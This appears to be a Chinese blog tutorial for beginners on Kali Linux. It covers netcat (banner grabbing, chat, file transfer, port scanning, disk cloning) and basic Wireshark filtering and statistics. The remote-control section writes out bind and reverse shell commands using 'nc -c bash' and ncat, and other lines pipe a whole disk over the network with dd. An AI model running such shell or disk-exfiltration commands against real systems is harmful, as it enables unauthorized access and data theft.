kali神器之实用工具的基本使用(详细)

前言

开始进行kali linux学习(修仙ing)


本文主要目标是基本工具的了解与使用。

NETCAT——NC

  • 网络工具中的瑞士军刀——小身材,大智慧。
  • 侦听模式/传输模式
  • telnet / 获取banner信息
  • 传输文本信息
  • 传输文件/目录
  • 加密传输文件
  • 远程控制/木马
  • 加密所有流量
  • 流媒体服务器
  • 远程克隆硬盘

NC——TELNET/BANNER

获取banner信息

nc -nv 1.1.1.1 110 //pop3服务
nc -nv 1.1.1.1 25  //smtp服务
nc -nv 1.1.1.1 80  //http服务

关于获取banner信息还有许多其他的工具可以利用,比如nmap还有dmitry都是kali自带的工具,都可以进行banner信息的获取。不一一举例。
通过nc -h查看功能
j4y

NC——传输文本信息

这个功能可以用来连接两台主机。进行聊天对话沟通。

A: nc -l -p 4444
B: nc -nv 1.1.1.1 4444

第一台主机代表服务端需要先侦听一个端口,使用第一条命令,-l代表listen,也就是听的意思,-p指的是端口,意思就是告诉nc我想要侦听4444端口。
第二台主机代表客户端,使用nc连接服务端的这个端口,就可以进行聊天。前提条件是,客户端必须知道服务端开启的端口和IP地址。
连接状态一方终止两边都会终止。

NC——传输文件/目录

传输文件

A: nc -lp 333 > 1.mp4     #接收端
B: nc -nv 1.1.1.1 333 < 1.mp4 -q 1    #发送端

接收端表示侦听一个333端口,并将接受的文件输出到1.MP4文件。
发送端表示nc连接输入文件进行发送。-q 1表示如果传送结束1秒后自动退出服务。(文件比较大的话可以使用这个比较方便)
简单来说就是A开启服务后,等待着B来给他发送文件。
或者使用这样的方式传输文件

A: nc -q 1 -lp 333 < a.mp4
B: nc -nv 1.1.1.1 333 > 2.mp4

A作为发送端,先将服务开启,然后B进行连接,一旦连接成功,就会进行传输,完成后一秒关闭连接。
这个是A开启服务后,准备一个文件,然后等待B来连接它并接收这个文件。
以上是两种传输方式,可以A传输给B也可以B传输给A。

传输目录

目录的传输也可以双向传输,与上述文件传输类似。下面只写一个方向。
可以使用以下命令

A: tar -cvf -music/ | nc -lp 333 -q 1
B: nc -nv 1.1.1.1 333 | tar -xvf -

cvf是将文件打包的作用,然后将打包后的文件灌输到管道中,使用nc进行传输。等待B连接。
B连接后接收到来自A端的文件,使用xvf解压tar包。还原成目录。

加密传输文件

使用命令

A: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1
B: nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4

这个是不用记的,毕竟这么长。
输入完整命令后,在A端也就是发送端会提示让输入密码(自己设置),设置密码后,再次进行输入(密码不显示,直接输入就行)。
在B端进行连接就会提示输入密码。这个密码就是A端设置的密码。输入正确就就可以接收。
:这个加密并不是nc自带的加密方式。而是利用了另一个程序的功能。这个程序名叫mcrypt,这个kali里面没有自带,需要自行安装。
安装方法直接用apt-get包管理器就行。

apt-get install mcrypt -y

NC——流媒体服务器

使用命令

A: cat 1.mp4 | nc -lp 333     # 服务端
B: nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000-      # 客户端

cat是查看文本信息的,这里也可以用来查看1.MP4的信息
mplayer是一个媒体播放应用。
cache 3000 表示缓存大小。

NC——端口扫描

端口扫描有好多工具可以使用。比如:nmap、Dmitry、netcat(也就是nc),这些都是kali当中自带的工具。
这里主要介绍学习nc
其他的后续可能会写。

nc -nvz IP地址 端口范围
如:nc -nvz 192.168.40.138 1-5000

NC——远程克隆硬盘

A: nc -lp 333 | dd of=/dev/sda   #接收方
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1   #这里B相当于被取证的电脑
  • 远程电子取证,可以将目标服务器硬盘远程复制或者内存。
    if相当于inputfile(输入)
    of相当于outputfile(输出)

NC——远程控制

#正向
A: nc -lp 333 -c bash  #服务器端
B: nc 1.1.1.1 333      #客户端
#反向
A: nc -lp 333           #客户端
B: nc 1.1.1.1 333 -c bash    #服务器端

这里利用shell使得用nc连接的用户可以进行远程控制
bash是linux系统自带的shell。
:windows用户把bash改成cmd

NC——NCAT

  • Nc缺乏加密和身份验证的能力。
  • Ncat包含于nmap工具包中
    使用方法
    依旧是A和B两台机器实验
A: ncat -c bash -allow 192.168.20.14 -vnl 333 -ssl
B: ncat -nv 1.1.1.1 333 -ssl

参数说明:
A:首先ncat需要给出一个bash(本地shell),然后-allow允许,后面加一个IP地址,是服务器端只允许指定的IP访问或连接。并且侦听一个端口333
B:直接连接就行
连接成功后服务器端会显示Ncat:Connection from [ip] [port]
其实过程中两台主机已经进行了SSL证书验证和指纹识别。
这个时候使用无论输入什么命令或者传输什么信息,都是经过加密的。这里两台主机传输信息的管道就是加密的。
SSL加密有一定的安全性保障,每次使用,它的指纹信息都是重新生成的。
不同系统/平台的nc参数功能不一定相同。比如Ubuntu的和kali的就不一样。

Wireshark

这个工具应该都了解,渗透工具排行榜第一。(突然想到了小说)

基本操作

启动

打开后回看到这样的(windows系统中)
j4y
选择一个进行扑捉流量数据,抓包的时候选择具体要抓哪个网卡的数据包。
如果这样还找不到自己想抓的包是哪个的话,就将鼠标移动到过滤器上,就能看到它的IP。

抓包/停止抓包

kali当中的wireshark
j4y
emmmm刚打开可能会需要输入密码,将kali的用户密码输进去就行了。(我用的是普通用户登录)可能root用户不用,看情况自定。
上图中箭头指的地方就是以太网。双击即可进行抓包。
j4y
点击这里停止抓包。
下一步,点击这里会出现可以选择的只抓取哪个特定的端口或服务。
j4y

筛选抓取服务

比如只抓80端口的数据。
还可以输入指定IP来抓取数据包。
j4y

首选项设置

j4y
不过我不想设置,懒。整那么多花里胡哨的做什么。

Wireshark——筛选器

  • 过滤掉干扰的数据包
  • 抓包筛选器
  • 显示筛选器
    筛选IP
    j4y
    就可以筛选目标IP的数据包。只看IP为目标IP的数据。

Wireshark——常见协议包

  • 数据包的分层结构
  • Arp
  • lcmp
  • TCP——三次握手
  • UDP
  • DNS
  • http
  • FTP

Wireshark——信息统计

  • 节点数
  • 协议分布
  • 包大小分布
  • 会话连接
  • 解码方式

这些功能基本都在统计里面,没有汉化的版本,名字叫Statistics
j4y

  • 捕获文件属性(Summary)
    j4y
    可以看到捕捉的接口,还有一共抓了多少包,包的大小等等一系列信息。
  • 通过端点(Endpoints)
    j4y
    查看ipv4,或者TCP和UDP的信息,可以看出一共是几个IP地址在通信。
    通过点击Bytes可以按照字节数进行排序
    j4y
    查找信息更加方便。可以查看哪些IP地址接收或者发送的数据包是最多的,以便了解到当前网络的数据包的发送与接收的情况。
  • 协议分级
    j4y
    可以看出当前为止我抓的数据包都是什么协议的,哪些协议占的比例多,一目了然。
  • 分组长度
    j4y
    通过统计包的长度可以看出当前抓取的数据包是打包居多还是小包居多。
    小包较多或者说大量的小包可能会造成网络的性能不好,还有很多攻击类型会使用小包来攻击,很有可能意味着某种攻击正在发生。
  • 会话
    j4y
    哪两个IP在进行对话,在这里可以看到,并且还有发包和接收包的大小,是A发送给B还是B发送给A都可以清楚的看到。
  • 解码方式
    j4y
    在应当进行解码的位置,右键单击,找到解码为,然后就可以解码为其他的协议。
    点击这里进行选择更改
    j4y
    wireshark的初步学习到此,以后慢慢实践。
    文末寄语:

我们知道他们在演戏,他们也知道自己在演戏,他们也知道我们知道他们在演戏,我们也知道他们知道我们知道他们在演戏。——佚名

posted @ 2020-05-26 17:49  m0re  阅读(1293)  评论(0编辑  收藏  举报